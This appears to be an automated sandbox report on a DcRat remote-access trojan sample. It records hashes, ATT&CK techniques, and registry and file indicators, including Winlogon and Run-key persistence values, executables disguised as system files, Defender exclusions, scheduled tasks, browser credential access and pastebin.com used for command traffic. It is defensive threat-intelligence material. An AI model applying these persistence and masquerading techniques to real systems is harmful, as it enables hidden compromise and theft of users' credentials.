dcrat | 429a6c2aa2f62fe5b656de97dd25152cd8e653d92a8dd5e75d067308b784bfaf

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26/01/2025, 13:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af4b66ff9b1f5830080860380efa81e4.exe
Size

7.0MB
MD5

af4b66ff9b1f5830080860380efa81e4
SHA1

53cc9bb12117af3f77354733abc4ef48ad339932
SHA256

429a6c2aa2f62fe5b656de97dd25152cd8e653d92a8dd5e75d067308b784bfaf
SHA512

8796e8f5cd290dc5cbf009a886796b61d7137630c89067450d863596cd9296eed846ffd5cd53e6750a5c52ba2741f95e3d8169c010ec307371c304a056acf431
SSDEEP

196608:M3NyJWZ3HC5ObjKh7+mSGZ5gPZaQC4b5DV2h:MdOWZyCUpt8b9Vy

Score

10^/10

dcrat defense_evasion discovery execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\", \"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\", \"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\", \"C:\\fontwin\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\""	MsServerHost.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3448	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1172	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2252	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4056	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3284	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1232	2484	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	2484	schtasks.exe	106

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 3448 created 3540	3448	twain32.exe	56
PID 3448 created 3540	3448	twain32.exe	56
PID 3448 created 3540	3448	twain32.exe	56
PID 3448 created 3540	3448	twain32.exe	56
PID 3448 created 3540	3448	twain32.exe	56
PID 3448 created 3540	3448	twain32.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56
PID 3172 created 3540	3172	updater.exe	56

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4232	powershell.exe
4700	powershell.exe
1992	powershell.exe
2776	powershell.exe
4564	powershell.exe
764	powershell.exe
4376	powershell.exe
4564	powershell.exe
4500	powershell.exe
1348	powershell.exe
1396	powershell.exe
4052	powershell.exe
3984	powershell.exe
4976	powershell.exe
3248	powershell.exe
3284	powershell.exe
3140	powershell.exe
4984	powershell.exe
4260	powershell.exe
404	powershell.exe
1420	powershell.exe
2776	powershell.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	MsServerHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	af4b66ff9b1f5830080860380efa81e4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	MpDefenderCoreService.exe

Executes dropped EXE 5 IoCs

pid	Process
3088	MpDefenderCoreService.exe
3448	twain32.exe
3172	updater.exe
2888	MsServerHost.exe
1592	fontdrvhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\Recovery\\WindowsRE\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Public\\winlogon.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Public\\winlogon.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\Recovery\\WindowsRE\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\""	MsServerHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	pastebin.com
17	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1720	powercfg.exe
3892	powercfg.exe
924	powercfg.exe
4276	powercfg.exe
876	powercfg.exe
3060	cmd.exe
1352	powercfg.exe
624	cmd.exe
1760	powercfg.exe
2408	powercfg.exe

Drops file in System32 directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\MsServerHostM	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\winlogon	svchost.exe
File created	\??\c:\Windows\System32\-63gkj.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\fontdrvhostf	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\winlogonw	svchost.exe
File created	\??\c:\Windows\System32\CSC5E2D5D3AA49F40418C336E32307AFD6A.TMP	csc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\MsServerHost	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\System32\Tasks\fontdrvhost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhostd	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3448 set thread context of 2652	3448	twain32.exe	99
PID 3172 set thread context of 380	3172	updater.exe	122
PID 3172 set thread context of 1264	3172	updater.exe	129
PID 3172 set thread context of 220	3172	updater.exe	130

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Crashpad\reports\5b884080fd4f94	MsServerHost.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\5940a34987c991	MsServerHost.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe	MsServerHost.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\5b884080fd4f94	MsServerHost.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain32.exe
File created	C:\Program Files\Crashpad\reports\fontdrvhost.exe	MsServerHost.exe
File opened for modification	C:\Program Files\Crashpad\reports\fontdrvhost.exe	MsServerHost.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe	MsServerHost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
632	sc.exe
3588	sc.exe
552	sc.exe
1368	sc.exe
2252	sc.exe
4084	sc.exe
3120	sc.exe
2800	sc.exe
380	sc.exe
2128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MpDefenderCoreService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	af4b66ff9b1f5830080860380efa81e4.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02losjushyjtzxpe	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001800123868145D"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02losjushyjtzxpe	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02losjushyjtzxpe"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02losjushyjtzxpe\DeviceId = "<Data LastUpdatedTime=\"1737898411\"><User username=\"02LOSJUSHYJTZXPE\"/></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	MpDefenderCoreService.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	MsServerHost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1172	schtasks.exe
556	schtasks.exe
4056	schtasks.exe
4968	schtasks.exe
3448	schtasks.exe
1944	schtasks.exe
3968	schtasks.exe
2660	schtasks.exe
1108	schtasks.exe
1232	schtasks.exe
2912	schtasks.exe
4340	schtasks.exe
2188	schtasks.exe
2372	schtasks.exe
5052	schtasks.exe
2252	schtasks.exe
3284	schtasks.exe
4872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3448	twain32.exe
3448	twain32.exe
4700	powershell.exe
4700	powershell.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
3448	twain32.exe
2652	dialer.exe
2652	dialer.exe
1420	powershell.exe
1420	powershell.exe
2652	dialer.exe
2652	dialer.exe
1420	powershell.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
1420	powershell.exe
2652	dialer.exe
2652	dialer.exe
3448	twain32.exe
3448	twain32.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe
2652	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	2652	dialer.exe
Token: SeShutdownPrivilege	1720	powercfg.exe
Token: SeCreatePagefilePrivilege	1720	powercfg.exe
Token: SeShutdownPrivilege	1352	powercfg.exe
Token: SeCreatePagefilePrivilege	1352	powercfg.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	3892	powercfg.exe
Token: SeCreatePagefilePrivilege	3892	powercfg.exe
Token: SeShutdownPrivilege	924	powercfg.exe
Token: SeCreatePagefilePrivilege	924	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1420	powershell.exe
Token: SeSecurityPrivilege	1420	powershell.exe
Token: SeTakeOwnershipPrivilege	1420	powershell.exe
Token: SeLoadDriverPrivilege	1420	powershell.exe
Token: SeSystemProfilePrivilege	1420	powershell.exe
Token: SeSystemtimePrivilege	1420	powershell.exe
Token: SeProfSingleProcessPrivilege	1420	powershell.exe
Token: SeIncBasePriorityPrivilege	1420	powershell.exe
Token: SeCreatePagefilePrivilege	1420	powershell.exe
Token: SeBackupPrivilege	1420	powershell.exe
Token: SeRestorePrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeSystemEnvironmentPrivilege	1420	powershell.exe
Token: SeRemoteShutdownPrivilege	1420	powershell.exe
Token: SeUndockPrivilege	1420	powershell.exe
Token: SeManageVolumePrivilege	1420	powershell.exe
Token: 33	1420	powershell.exe
Token: 34	1420	powershell.exe
Token: 35	1420	powershell.exe
Token: 36	1420	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2096	svchost.exe
Token: SeIncreaseQuotaPrivilege	2096	svchost.exe
Token: SeSecurityPrivilege	2096	svchost.exe
Token: SeTakeOwnershipPrivilege	2096	svchost.exe
Token: SeLoadDriverPrivilege	2096	svchost.exe
Token: SeSystemtimePrivilege	2096	svchost.exe
Token: SeBackupPrivilege	2096	svchost.exe
Token: SeRestorePrivilege	2096	svchost.exe
